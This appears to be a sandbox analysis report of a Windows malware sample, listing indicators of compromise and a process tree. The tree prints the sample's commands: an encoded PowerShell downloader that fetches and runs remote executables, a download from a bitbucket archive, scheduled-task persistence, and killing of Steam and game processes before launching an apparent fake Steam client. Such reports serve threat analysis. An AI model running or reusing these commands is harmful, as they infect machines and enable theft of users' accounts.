powershell.exepowershell.exepowershell.exehdsre0ck.3sb2.exedialer.exehdsre0ck.3sb3.exepowershell.exedialer.exe

pid	process
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
208	powershell.exe
208	powershell.exe
208	powershell.exe
5028	hdsre0ck.3sb2.exe
5028	hdsre0ck.3sb2.exe
4996	dialer.exe
4996	dialer.exe
4996	dialer.exe
4996	dialer.exe
4908	hdsre0ck.3sb3.exe
4988	powershell.exe
4988	powershell.exe
4988	powershell.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
4908	hdsre0ck.3sb3.exe
5036	dialer.exe
5036	dialer.exe
4908	hdsre0ck.3sb3.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe
5036	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exehdsre0ck.3sb4.exepowershell.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeIncreaseQuotaPrivilege	1060	powershell.exe
Token: SeSecurityPrivilege	1060	powershell.exe
Token: SeTakeOwnershipPrivilege	1060	powershell.exe
Token: SeLoadDriverPrivilege	1060	powershell.exe
Token: SeSystemProfilePrivilege	1060	powershell.exe
Token: SeSystemtimePrivilege	1060	powershell.exe
Token: SeProfSingleProcessPrivilege	1060	powershell.exe
Token: SeIncBasePriorityPrivilege	1060	powershell.exe
Token: SeCreatePagefilePrivilege	1060	powershell.exe
Token: SeBackupPrivilege	1060	powershell.exe
Token: SeRestorePrivilege	1060	powershell.exe
Token: SeShutdownPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeSystemEnvironmentPrivilege	1060	powershell.exe
Token: SeRemoteShutdownPrivilege	1060	powershell.exe
Token: SeUndockPrivilege	1060	powershell.exe
Token: SeManageVolumePrivilege	1060	powershell.exe
Token: 33	1060	powershell.exe
Token: 34	1060	powershell.exe
Token: 35	1060	powershell.exe
Token: 36	1060	powershell.exe
Token: SeDebugPrivilege	4676	hdsre0ck.3sb4.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	wmic.exe
Token: SeSecurityPrivilege	4680	wmic.exe
Token: SeTakeOwnershipPrivilege	4680	wmic.exe
Token: SeLoadDriverPrivilege	4680	wmic.exe
Token: SeSystemProfilePrivilege	4680	wmic.exe
Token: SeSystemtimePrivilege	4680	wmic.exe
Token: SeProfSingleProcessPrivilege	4680	wmic.exe
Token: SeIncBasePriorityPrivilege	4680	wmic.exe
Token: SeCreatePagefilePrivilege	4680	wmic.exe
Token: SeBackupPrivilege	4680	wmic.exe
Token: SeRestorePrivilege	4680	wmic.exe
Token: SeShutdownPrivilege	4680	wmic.exe
Token: SeDebugPrivilege	4680	wmic.exe
Token: SeSystemEnvironmentPrivilege	4680	wmic.exe
Token: SeRemoteShutdownPrivilege	4680	wmic.exe
Token: SeUndockPrivilege	4680	wmic.exe
Token: SeManageVolumePrivilege	4680	wmic.exe
Token: 33	4680	wmic.exe
Token: 34	4680	wmic.exe
Token: 35	4680	wmic.exe
Token: 36	4680	wmic.exe
Token: SeIncreaseQuotaPrivilege	4680	wmic.exe
Token: SeSecurityPrivilege	4680	wmic.exe
Token: SeTakeOwnershipPrivilege	4680	wmic.exe
Token: SeLoadDriverPrivilege	4680	wmic.exe
Token: SeSystemProfilePrivilege	4680	wmic.exe
Token: SeSystemtimePrivilege	4680	wmic.exe
Token: SeProfSingleProcessPrivilege	4680	wmic.exe
Token: SeIncBasePriorityPrivilege	4680	wmic.exe
Token: SeCreatePagefilePrivilege	4680	wmic.exe
Token: SeBackupPrivilege	4680	wmic.exe
Token: SeRestorePrivilege	4680	wmic.exe
Token: SeShutdownPrivilege	4680	wmic.exe
Token: SeDebugPrivilege	4680	wmic.exe
Token: SeSystemEnvironmentPrivilege	4680	wmic.exe
Token: SeRemoteShutdownPrivilege	4680	wmic.exe
Token: SeUndockPrivilege	4680	wmic.exe
Token: SeManageVolumePrivilege	4680	wmic.exe
Token: 33	4680	wmic.exe
Token: 34	4680	wmic.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

Explorer.EXE

pid process

3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
3284 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

RuntimeBroker.exe

pid process

3796 RuntimeBroker.exe

pid	process
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE

pid	process
3796	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exepowershell.exehdsre0ck.3sb0.exehdsre0ck.3sb1.execmd.execmd.exehdsre0ck.3sb4.execmd.execmd.exehdsre0ck.3sb2.exe

description	pid	process	target process
PID 3328 wrote to memory of 1060	3328	Launcher.exe	powershell.exe
PID 3328 wrote to memory of 1060	3328	Launcher.exe	powershell.exe
PID 1060 wrote to memory of 1908	1060	powershell.exe	hdsre0ck.3sb0.exe
PID 1060 wrote to memory of 1908	1060	powershell.exe	hdsre0ck.3sb0.exe
PID 1060 wrote to memory of 1908	1060	powershell.exe	hdsre0ck.3sb0.exe
PID 1060 wrote to memory of 624	1060	powershell.exe	hdsre0ck.3sb1.exe
PID 1060 wrote to memory of 624	1060	powershell.exe	hdsre0ck.3sb1.exe
PID 1060 wrote to memory of 624	1060	powershell.exe	hdsre0ck.3sb1.exe
PID 1060 wrote to memory of 5028	1060	powershell.exe	hdsre0ck.3sb2.exe
PID 1060 wrote to memory of 5028	1060	powershell.exe	hdsre0ck.3sb2.exe
PID 1060 wrote to memory of 5028	1060	powershell.exe	hdsre0ck.3sb2.exe
PID 1060 wrote to memory of 4908	1060	powershell.exe	hdsre0ck.3sb3.exe
PID 1060 wrote to memory of 4908	1060	powershell.exe	hdsre0ck.3sb3.exe
PID 1060 wrote to memory of 4676	1060	powershell.exe	hdsre0ck.3sb4.exe
PID 1060 wrote to memory of 4676	1060	powershell.exe	hdsre0ck.3sb4.exe
PID 1908 wrote to memory of 3976	1908	hdsre0ck.3sb0.exe	cmd.exe
PID 1908 wrote to memory of 3976	1908	hdsre0ck.3sb0.exe	cmd.exe
PID 624 wrote to memory of 2396	624	hdsre0ck.3sb1.exe	cmd.exe
PID 624 wrote to memory of 2396	624	hdsre0ck.3sb1.exe	cmd.exe
PID 2396 wrote to memory of 4596	2396	cmd.exe	where.exe
PID 2396 wrote to memory of 4596	2396	cmd.exe	where.exe
PID 3976 wrote to memory of 4624	3976	cmd.exe	chcp.com
PID 3976 wrote to memory of 4624	3976	cmd.exe	chcp.com
PID 4676 wrote to memory of 4252	4676	hdsre0ck.3sb4.exe	attrib.exe
PID 4676 wrote to memory of 4252	4676	hdsre0ck.3sb4.exe	attrib.exe
PID 2396 wrote to memory of 5020	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 5020	2396	cmd.exe	powershell.exe
PID 3976 wrote to memory of 4084	3976	cmd.exe	findstr.exe
PID 3976 wrote to memory of 4084	3976	cmd.exe	findstr.exe
PID 3976 wrote to memory of 1936	3976	cmd.exe	findstr.exe
PID 3976 wrote to memory of 1936	3976	cmd.exe	findstr.exe
PID 4676 wrote to memory of 3624	4676	hdsre0ck.3sb4.exe	attrib.exe
PID 4676 wrote to memory of 3624	4676	hdsre0ck.3sb4.exe	attrib.exe
PID 4676 wrote to memory of 4680	4676	hdsre0ck.3sb4.exe	wmic.exe
PID 4676 wrote to memory of 4680	4676	hdsre0ck.3sb4.exe	wmic.exe
PID 3976 wrote to memory of 4112	3976	cmd.exe	findstr.exe
PID 3976 wrote to memory of 4112	3976	cmd.exe	findstr.exe
PID 3976 wrote to memory of 4428	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 4428	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 4260	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 4260	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 3644	3976	cmd.exe	cmd.exe
PID 3976 wrote to memory of 3644	3976	cmd.exe	cmd.exe
PID 3644 wrote to memory of 524	3644	cmd.exe	reg.exe
PID 3644 wrote to memory of 524	3644	cmd.exe	reg.exe
PID 3976 wrote to memory of 4628	3976	cmd.exe	cmd.exe
PID 3976 wrote to memory of 4628	3976	cmd.exe	cmd.exe
PID 4628 wrote to memory of 292	4628	cmd.exe	reg.exe
PID 4628 wrote to memory of 292	4628	cmd.exe	reg.exe
PID 3976 wrote to memory of 208	3976	cmd.exe	powershell.exe
PID 3976 wrote to memory of 208	3976	cmd.exe	powershell.exe
PID 5028 wrote to memory of 4996	5028	hdsre0ck.3sb2.exe	dialer.exe
PID 5028 wrote to memory of 4996	5028	hdsre0ck.3sb2.exe	dialer.exe
PID 5028 wrote to memory of 4996	5028	hdsre0ck.3sb2.exe	dialer.exe
PID 5028 wrote to memory of 4996	5028	hdsre0ck.3sb2.exe	dialer.exe
PID 5028 wrote to memory of 4996	5028	hdsre0ck.3sb2.exe	dialer.exe
PID 3976 wrote to memory of 5044	3976	cmd.exe	tasklist.exe
PID 3976 wrote to memory of 5044	3976	cmd.exe	tasklist.exe
PID 3976 wrote to memory of 2156	3976	cmd.exe	find.exe
PID 3976 wrote to memory of 2156	3976	cmd.exe	find.exe
PID 3976 wrote to memory of 5112	3976	cmd.exe	taskkill.exe
PID 3976 wrote to memory of 5112	3976	cmd.exe	taskkill.exe
PID 3976 wrote to memory of 3332	3976	cmd.exe	tasklist.exe
PID 3976 wrote to memory of 3332	3976	cmd.exe	tasklist.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4252 attrib.exe
3624 attrib.exe

pid	process
4252	attrib.exe
3624	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:580

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1008

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Modifies data under HKEY_USERS
PID:304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1068

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1088

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1140

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1292

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2952

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1992

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2256

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2288

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2388

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2944

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4996

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2980

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3188

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3284

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060

C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb0.exe
"C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb0.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FDE.tmp\7FDF.tmp\7FE0.bat C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb0.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1452

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:4624

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:4084

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:1936

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:4112

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
6⤵
PID:4428

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
6⤵
- Creates scheduled task(s)
PID:4260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
7⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
- Suspicious use of WriteProcessMemory
PID:4628

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
7⤵
PID:292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:208

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5044

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
6⤵
PID:2156

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
6⤵
- Kills process with taskkill
PID:5112

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:3332

C:\Windows\system32\find.exe
find /i "dota2.exe"
6⤵
PID:4964

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
6⤵
- Kills process with taskkill
PID:68

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:4684

C:\Windows\system32\find.exe
find /i "cs2.exe"
6⤵
PID:812

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
6⤵
- Kills process with taskkill
PID:5008

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:3300

C:\Windows\system32\find.exe
find /i "RustClient.exe"
6⤵
PID:4888

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
6⤵
- Kills process with taskkill
PID:4596

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:2800

C:\Windows\system32\find.exe
find /i "GTA5.exe"
6⤵
PID:424

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
6⤵
- Kills process with taskkill
PID:2848

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:4608

C:\Windows\system32\find.exe
find /i "TslGame.exe"
6⤵
PID:828

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
6⤵
- Kills process with taskkill
PID:804

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:1772

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
6⤵
PID:64

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
6⤵
- Kills process with taskkill
PID:1516

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
PID:2024

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:2400

C:\Windows\system32\find.exe
find /i "steam.exe"
6⤵
PID:292

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
6⤵
- Kills process with taskkill
PID:4788

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2220

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4120

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4464

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3456

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3616

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:316

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3520

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3232

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2108

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4480

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5012

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1516

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2844

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4112

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2200

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2052

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:32

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:216

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5028

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2796

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5032

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
